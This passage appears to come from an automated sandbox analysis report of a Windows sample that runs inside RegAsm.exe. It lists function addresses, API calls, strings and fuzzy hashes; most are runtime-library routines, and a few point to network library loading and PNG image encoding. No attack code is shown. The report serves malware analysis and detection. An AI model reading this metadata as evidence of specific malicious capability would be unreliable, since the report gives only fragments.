Instruction Fuzzy Hash: 22113F72E407142BE7305F786C8AFAF37ACEB55769F100265F909E62C1FAB44D489391

Function 00443734 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b057469d9bc5f69e0f8b611fad5c821e03d6bc773c10b2b7f28a1d317aa21b2f
Instruction ID: b5fe3350cd15eea0aaf87c65c2f18f4f52b92c45156554196b4f926f22b003f4
Opcode Fuzzy Hash: b057469d9bc5f69e0f8b611fad5c821e03d6bc773c10b2b7f28a1d317aa21b2f
Instruction Fuzzy Hash: 6621F6F1200205AFFB20AF76CC8186BB7A9FF4076A710C51BF95987250DB39EE518769

Function 00545920 Relevance: 6.1, APIs: 4, Instructions: 76fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,?,00000000), ref: 00545949
GetLastError.KERNEL32 ref: 00545956
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0054598E
GetLastError.KERNEL32 ref: 005459BF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLast$PointerWrite
String ID:
API String ID: 2977825765-0
Opcode ID: 1950966d951f8c867560627456bbde13738b7accb01c1cd70c58ef6c62dd0c24
Instruction ID: 582698eb55b2eaae6c7c0c5214501257d254c964c7943da035f428691071258d
Opcode Fuzzy Hash: 1950966d951f8c867560627456bbde13738b7accb01c1cd70c58ef6c62dd0c24
Instruction Fuzzy Hash: 0E219F33600609EBDB208FA8D884BDABBB8FB44375F144166ED18D7281E631DD04DBA0

Function 0045098D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00450995

Part of subcall function 0044EC55: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0044A862,?,00000000,-00000008), ref: 0044ECB6

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004509CD
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004509ED

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: ecb8c3d69c8a0bfc2b39946dcd8d67978ebfa7340f76592b72f7090c7a48624c
Instruction ID: 05a916c6faf25a0682dab3744c632e1b74caa3fe19fc9bf69ed868d66b577761
Opcode Fuzzy Hash: ecb8c3d69c8a0bfc2b39946dcd8d67978ebfa7340f76592b72f7090c7a48624c
Instruction Fuzzy Hash: EB112BF6901719BF77216BB35C89CBF696CEE6839B710002AF801D1243FB29CD0591B9

Function 005459E0 Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 005459FF
GetLastError.KERNEL32 ref: 00545A0A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00545A32
GetLastError.KERNEL32 ref: 00545A3C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID:
API String ID: 2170121939-0
Opcode ID: 540eb84cac6ede58d3537ff1f38c1a90d22693d8cdf9cf0c6dadd44eecfb50f4
Instruction ID: 6ceb55c3a65a62e15609471827d2f6869488a49b85fb46b58a4ba310ad65ed5c
Opcode Fuzzy Hash: 540eb84cac6ede58d3537ff1f38c1a90d22693d8cdf9cf0c6dadd44eecfb50f4
Instruction Fuzzy Hash: 6D119172600209ABCB108FA9EC45BDABBA8FF14375F004266FD1CC72A0E771D8609BD1

Function 00545770 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?), ref: 00545797
LockFileEx.KERNEL32(?,00000001,00000000,000001FE,00000000,?,00000000,?), ref: 005457DB
LockFile.KERNEL32(?,?,00000000,00000001,00000000,00000000,?), ref: 00545818
GetLastError.KERNEL32 ref: 00545824

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FileLock$ErrorLastVersion
String ID:
API String ID: 1561719237-0
Opcode ID: 47948f3ac46128f688e1d1758b7c43b77088cf2001bc0b658931b0abdcadf5d0
Instruction ID: 771d51dfa285cbb2dd74062f629081d2be7cfc554bc2a81a6f00ae30f739e82a
Opcode Fuzzy Hash: 47948f3ac46128f688e1d1758b7c43b77088cf2001bc0b658931b0abdcadf5d0
Instruction Fuzzy Hash: DB110171A00715EFF7208B64DC0ABAABBB5FF14314F004165F909E72D0EBB49D448B90

Function 00431F0C Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000), ref: 00431F29
GetLastError.KERNEL32 ref: 00431F35
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00431F5B
GetLastError.KERNEL32 ref: 00431F67

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 35e7bea43bf35a340b569ac256c958a5570a5f93565d5de543f4fdf7da8372b1
Instruction ID: 5e8341cea1a57eda6e9d4b8ca3b7a39c6f892c49641055c0ca5066718be154a8
Opcode Fuzzy Hash: 35e7bea43bf35a340b569ac256c958a5570a5f93565d5de543f4fdf7da8372b1
Instruction Fuzzy Hash: C901FF36600255BBCF221FA1DC08D9B3E36EBD97A1F104015FE1556230C7318866E7B5

Function 005458C0 Relevance: 6.0, APIs: 4, Instructions: 35fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 005458DF
GetLastError.KERNEL32 ref: 005458EA
SetEndOfFile.KERNEL32(?), ref: 005458F7
GetLastError.KERNEL32 ref: 00545901

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLast$Pointer
String ID:
API String ID: 1697706070-0
Opcode ID: 99ed1c69f56f5325abe80c91d58b6415e30b45006e4dec00d143e7c5daf9e1c0
Instruction ID: 8fd75b374af1164205c64c99f3da373fde227693c6e20ab0659c9ae24c58912b
Opcode Fuzzy Hash: 99ed1c69f56f5325abe80c91d58b6415e30b45006e4dec00d143e7c5daf9e1c0
Instruction Fuzzy Hash: BFF03032514708EFDB209FA4EC05AAA7BB8FB15735F104656F82DC62A0E731D924AB91

Function 00456D32 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,0043D547,00000000,00000000,?,00453DCE,00000000,00000001,?,?,?,00449291,?,00000000,00000000), ref: 00456D49
GetLastError.KERNEL32(?,00453DCE,00000000,00000001,?,?,?,00449291,?,00000000,00000000,?,?,?,0044986B,00000000), ref: 00456D55

Part of subcall function 00456D1B: CloseHandle.KERNEL32(FFFFFFFE,00456D65,?,00453DCE,00000000,00000001,?,?,?,00449291,?,00000000,00000000,?,?), ref: 00456D2B

___initconout.LIBCMT ref: 00456D65

Part of subcall function 00456CDD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00456D0C,00453DBB,?,?,00449291,?,00000000,00000000,?), ref: 00456CF0

WriteConsoleW.KERNEL32(00000000,00000000,0043D547,00000000,?,00453DCE,00000000,00000001,?,?,?,00449291,?,00000000,00000000,?), ref: 00456D7A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6d252f6c85546040703605b5d122fbb434f3c9b6b34be8e7cd3f73b3df330617
Instruction ID: b582005f90f2c4d159ccd48a3422ceca8e6e351b7b3b67145bbef734a6de3f3c
Opcode Fuzzy Hash: 6d252f6c85546040703605b5d122fbb434f3c9b6b34be8e7cd3f73b3df330617
Instruction Fuzzy Hash: F4F01C37500518BBCF221FD1DC18A8A3F76EB583A2B814415FE0D96231D6328928EB94

Function 00481BC0 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00481BC4
GetCurrentProcessId.KERNEL32 ref: 00481BCC
SetEvent.KERNEL32 ref: 00481BE9
WaitForSingleObject.KERNEL32(000000FF), ref: 00481BF7

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Current$EventObjectProcessSingleThreadWait
String ID:
API String ID: 977356572-0
Opcode ID: 145f1463f0330e510467377b19718f6381c7c9cc9e72a15fcc7b338b6b78320b
Instruction ID: 43167ce624a0f5263368e741b5dc2b465bdabedb5219c12b94d6a200efc4dfb2
Opcode Fuzzy Hash: 145f1463f0330e510467377b19718f6381c7c9cc9e72a15fcc7b338b6b78320b
Instruction Fuzzy Hash: 3FE01A72004315DFD7109F64EC1C855BBB5FB293227148221F9099B3B0E6318989EBA5

Function 00408F20 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 272libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,?,?,?,?,?,00000004,00000000), ref: 004091C8
GetProcAddress.KERNEL32(00000000,?), ref: 004091D3

Strings

Ws2_32.dll, xrefs: 004091BF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Ws2_32.dll
API String ID: 1646373207-3093949381
Opcode ID: ea9167e3bcfed1d29222b40259f4286497e10de2dd63420951b2f22a9489b711
Instruction ID: cb5ead6240095672237fdab8273f91d80b82b8d73d4ae51f565ea22395c8577a
Opcode Fuzzy Hash: ea9167e3bcfed1d29222b40259f4286497e10de2dd63420951b2f22a9489b711
Instruction Fuzzy Hash: E7C16A70E01214DFCB24CFA8C84579EBBB0BF08714F24859EE955AB392D779AD01CB95

Function 00406B10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00406CF0
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00406D3E

Strings

., xrefs: 00406D10

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .
API String ID: 2610647541-248832578
Opcode ID: 8de97e0557b89d418490575b2115c1d7852bdd46763aabdbcc61db0957447ddc
Instruction ID: 06e113195c9c995bb1126ed1958f592d786724859c69b2563011d6ef3baaff07
Opcode Fuzzy Hash: 8de97e0557b89d418490575b2115c1d7852bdd46763aabdbcc61db0957447ddc
Instruction Fuzzy Hash: 6A91D071A00625ABCB34DF18C4846AAB7B4FF05324F01026AE856A77D0D739FDA5CBD9

Function 004036E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 178COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403819
___std_exception_destroy.LIBVCRUNTIME ref: 004038F0

Strings

)@, xrefs: 004037ED, 004038EA

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: )@
API String ID: 2970364248-4120265097
Opcode ID: 49e550ce0a0fc218c028ebf46731d2743aeb61f2157d0f7211ce111f087d6aa6
Instruction ID: 269ef50febfdc4b1c22cf7239a576f40f0b19685bcb009e1facc48eb6157c32a
Opcode Fuzzy Hash: 49e550ce0a0fc218c028ebf46731d2743aeb61f2157d0f7211ce111f087d6aa6
Instruction Fuzzy Hash: DD6169B1C00248DBDB10DF98C945B9EFFB5FF19324F14825EE814AB282D7B95A44CBA5

Function 004506D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 00450207: GetOEMCP.KERNEL32(00000000,?,?,00449A56,4D88C033), ref: 00450232

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00450517,?,00000000,?,00449A56,4D88C033), ref: 00450731
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00450517,?,00000000,?,00449A56,4D88C033), ref: 0045076D

Strings

]=_I, xrefs: 004506D8

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: ]=_I
API String ID: 546120528-112444943
Opcode ID: bd9b697cda6ee5440ebb279ae3e4e6d422f39716693d4c7e6d3692ef1bf550cc
Instruction ID: 848947a649996ec97b6362adc7f8fba847a2f133dc7c8ef5c982cb84bd7b0702
Opcode Fuzzy Hash: bd9b697cda6ee5440ebb279ae3e4e6d422f39716693d4c7e6d3692ef1bf550cc
Instruction Fuzzy Hash: 2B5143789007418EDB20DF36C890AABBBF4FF45305F18456FD88287253E778A90ACB94

Function 004047F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040499F

Part of subcall function 004351FB: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,74D723A0,?,00431D09,?,005799D8,74D723A0,?,74D723A0,-00589880), ref: 0043525B

Strings

ios_base::failbit set, xrefs: 00404828
ios_base::badbit set, xrefs: 00404937, 00404962

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionIos_base_dtorRaisestd::ios_base::_
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 1903096808-1240500531
Opcode ID: 76c2cc0b94eedc0f97d2c3f3bdda3a2fff9bd54eddcdb431ab9f4186c147fcf0
Instruction ID: 59789774a96eacd1a5b8f49c51d8e497543063f0a2ed12b155596828dbf76f3a
Opcode Fuzzy Hash: 76c2cc0b94eedc0f97d2c3f3bdda3a2fff9bd54eddcdb431ab9f4186c147fcf0
Instruction Fuzzy Hash: E84124B2C00244ABCB04DF68C845BAEBBB8FB49710F14826EF554A73C1D7795A00CBA5

Function 0044EA2E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(00000000,?,00000000,?,?,?,?,?,!,D,0044EA1C,?,?,!,D,?,00000000,?), ref: 0044EB7A
GetLastError.KERNEL32(?,?,?,?,!,D,0044EA1C,?,?,!,D,?,00000000,?), ref: 0044EB84

Strings

!,D, xrefs: 0044EA30

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLast
String ID: !,D
API String ID: 734332943-2387483618
Opcode ID: 4484bdeeca6e2c418bf7a37d0a650372ec279d4e80f27bae84b49d1ef93bb9f1
Instruction ID: 1e1ef3cad634bc89b09ed5b2214d0c7337f84d15d2fc9132cafc43e0310a1cdb
Opcode Fuzzy Hash: 4484bdeeca6e2c418bf7a37d0a650372ec279d4e80f27bae84b49d1ef93bb9f1
Instruction Fuzzy Hash: FB511971900685AAFB14CF67CC85B9E7B70FF04328F14021BF516A2281D779E891DBA9

Function 0043916E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004391BE
ReadFile.KERNEL32(?,?,00001000,?,00000000,00438EFB,00000001,00000000,?,?,?,?,?), ref: 00439244

Strings

]=_I, xrefs: 0043917D

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: ]=_I
API String ID: 1834446548-112444943
Opcode ID: cb096665265bedd2c21d32d0922146fd01402ec342ece577b03bc7772ab97d66
Instruction ID: 2aa8a932c9972a7f04d00e084e9efc5f4a6ca814745764ac8c229c4b5deaa83d
Opcode Fuzzy Hash: cb096665265bedd2c21d32d0922146fd01402ec342ece577b03bc7772ab97d66
Instruction Fuzzy Hash: 2141E175A00158ABDB20CF25CD80BEA77B5AF4C304F1490EAE94A97281D7B8DDC18B58

Function 004D65F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 004D676A
std::_Throw_Cpp_error.LIBCPMT ref: 004D677B

Strings

UaJ, xrefs: 004D65FD

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID: UaJ
API String ID: 2134207285-2144978721
Opcode ID: 71bc9411bda081ba2c6ca070473d6e11764a2e135bc835127b003db35da83e39
Instruction ID: 177bb7d1701b8dda1f5a90c4ee3be826f8175b366ab48e47effb054e9b4aa952
Opcode Fuzzy Hash: 71bc9411bda081ba2c6ca070473d6e11764a2e135bc835127b003db35da83e39
Instruction Fuzzy Hash: 6441F2B1E002058BC720DF68995136EBBA1BB94314F19072FE815673D1EB79EA04C795

Function 0044950F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,004498E0,00000000,?,00000000,0043D547,00000000,00000000,?,00000000,?,00432B5E), ref: 004495F8
GetLastError.KERNEL32(004498E0,00000000,?,00000000,0043D547,00000000,00000000,?,00000000,?,00432B5E,0043D547,00000000,00432B5E,?,?), ref: 00449628

Strings

]=_I, xrefs: 0044951E

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: ]=_I
API String ID: 442123175-112444943
Opcode ID: 0d3ed53c39a089a8ec325ea5aa8d5b13b5da96ae9553d9d375a4c7f5aff91183
Instruction ID: f73019d16310ea8bf95085800347155848ebaab9ec8c23de2d09ac84cd0b5cba
Opcode Fuzzy Hash: 0d3ed53c39a089a8ec325ea5aa8d5b13b5da96ae9553d9d375a4c7f5aff91183
Instruction Fuzzy Hash: B631B671A00219AFEB14CF29CC81AEA73B5EB48305F1440AAE505D7390DB34EE85DB64

Function 0044F44D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,-00000008,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,FFFFF9B5), ref: 0044F517
__freea.LIBCMT ref: 0044F524

Part of subcall function 0044B094: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00434B3F,?,?,74D723A0,?,?,00403522,?,?), ref: 0044B0C6

Strings

]=_I, xrefs: 0044F455

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeapStringType__freea
String ID: ]=_I
API String ID: 4073780324-112444943
Opcode ID: 1462f36c121c0afd10097a67a706bd06041a4ca95ed2563d1871c2218f5aa8d6
Instruction ID: 623569177bf507e179e99869351a5744441e3b119814575904da255882b80d2c
Opcode Fuzzy Hash: 1462f36c121c0afd10097a67a706bd06041a4ca95ed2563d1871c2218f5aa8d6
Instruction Fuzzy Hash: 2D31B07290020ABBEF219FA5DC45EAFBBA5EF44314F05012AF804A7252E738CD55CB95

Function 004E6270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004E6290
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 004E62BD

Strings

image/png, xrefs: 004E62D2

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: e7fc661bbe40e167e968ce4b4834ac07952c6a2874a5ff204e6fe5eb7edf3d15
Instruction ID: e08145eb1897d221235e8b13ede795c589c6d842b6ab703e07584c42203d8d4f
Opcode Fuzzy Hash: e7fc661bbe40e167e968ce4b4834ac07952c6a2874a5ff204e6fe5eb7edf3d15
Instruction Fuzzy Hash: 99216D72E00104ABDB10AFA6DC816AFB7B8FF34395F1201F6ED05A7351E7369A44C295

Function 00449426 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,004498C9,00000000,?,00000000,0043D547,00000000,00000000), ref: 004494D0
GetLastError.KERNEL32(?,004498C9,00000000,?,00000000,0043D547,00000000,00000000,?,00000000,?,00432B5E,0043D547,00000000,00432B5E,?), ref: 004494F6

Strings

]=_I, xrefs: 00449435

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: ]=_I
API String ID: 442123175-112444943
Opcode ID: f5cdea2516baa706d34e8cc924436e2438bf29b31cded2bb14216d90f40636a2
Instruction ID: 4b749f9d83c87c5f8390b45c97d785985472917128928b70747dfb9a37eec38c
Opcode Fuzzy Hash: f5cdea2516baa706d34e8cc924436e2438bf29b31cded2bb14216d90f40636a2
Instruction Fuzzy Hash: C121B431A002199FDB24CF29DC809EAB3F9FF49315F1444AAE909D7250D734AE86DBA4

Function 0044934B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,004498F4,00000000,?,00000000,0043D547,00000000,00000000), ref: 004493E7
GetLastError.KERNEL32(?,004498F4,00000000,?,00000000,0043D547,00000000,00000000,?,00000000,?,00432B5E,0043D547,00000000,00432B5E,?), ref: 0044940D

Strings

]=_I, xrefs: 0044935A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: ]=_I
API String ID: 442123175-112444943
Opcode ID: 18e601eefd24b498133f90ce4f5a9485efee07663e8228618f930b371e107dd3
Instruction ID: e5592cb24fced7f67a5d6b2eb2e68ce94541d3c631afa3472be871a26c5696b9
Opcode Fuzzy Hash: 18e601eefd24b498133f90ce4f5a9485efee07663e8228618f930b371e107dd3
Instruction Fuzzy Hash: BC21B131A002199FDF15CF29DD809EAB7B9EB4D305F1040AAE90AD7251D7309E46DB64

Function 00404040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404061
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004040C4

Strings

bad locale name, xrefs: 004040E6

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 0039d2d2ea2786ef81fe116e8b864d57793cf36a19fa060d6cb0c255b1586cee
Instruction ID: 65c2995a4cce64452fc0e082f9126f7f9302ed92d60cad1113ce5137d9e79936
Opcode Fuzzy Hash: 0039d2d2ea2786ef81fe116e8b864d57793cf36a19fa060d6cb0c255b1586cee
Instruction Fuzzy Hash: DB112670805B84EED321CF69C50474BBFF0AF25714F10868DD09597781D3B9A604CB95

Function 00433D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00434550
___raise_securityfailure.LIBCMT ref: 00434638

Strings

]=_I, xrefs: 00434619

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: ]=_I
API String ID: 3761405300-112444943
Opcode ID: 922f535dec73a9aa7123f8b2dff1345e00917cd2deb2abe5aad8291dbd1d8ffe
Instruction ID: fb6a5db94691dfab1f7729fc29bac2108db168908d913bcd109d3e57788927b9
Opcode Fuzzy Hash: 922f535dec73a9aa7123f8b2dff1345e00917cd2deb2abe5aad8291dbd1d8ffe
Instruction Fuzzy Hash: 3D21E5B4540200EED750DF16EC56B603BA4FB38314F94612AED09AB3A0FB745949EF45

Function 00416590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004165C9
___std_exception_copy.LIBVCRUNTIME ref: 004165FC

Strings

)@, xrefs: 004165BA, 004165ED

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ___std_exception_copy
String ID: )@
API String ID: 2659868963-4120265097
Opcode ID: ec459901e9a8c12f2536e06f4ce64afd8286d8aca2aa337d2d7da09c98386d96
Instruction ID: 79ebb971947c26e29da123751e765caa72f3f100f47198c89106861aa63fe252
Opcode Fuzzy Hash: ec459901e9a8c12f2536e06f4ce64afd8286d8aca2aa337d2d7da09c98386d96
Instruction Fuzzy Hash: F0112EB6910649EBCB11CF99C980B86FBF8FF09724F10876AE82497641E774A5448BA0

Function 004327B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004327C2
std::_Lockit::~_Lockit.LIBCPMT ref: 0043281E

Strings

`-@, xrefs: 004327E9, 00432803

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: `-@
API String ID: 593203224-3781167437
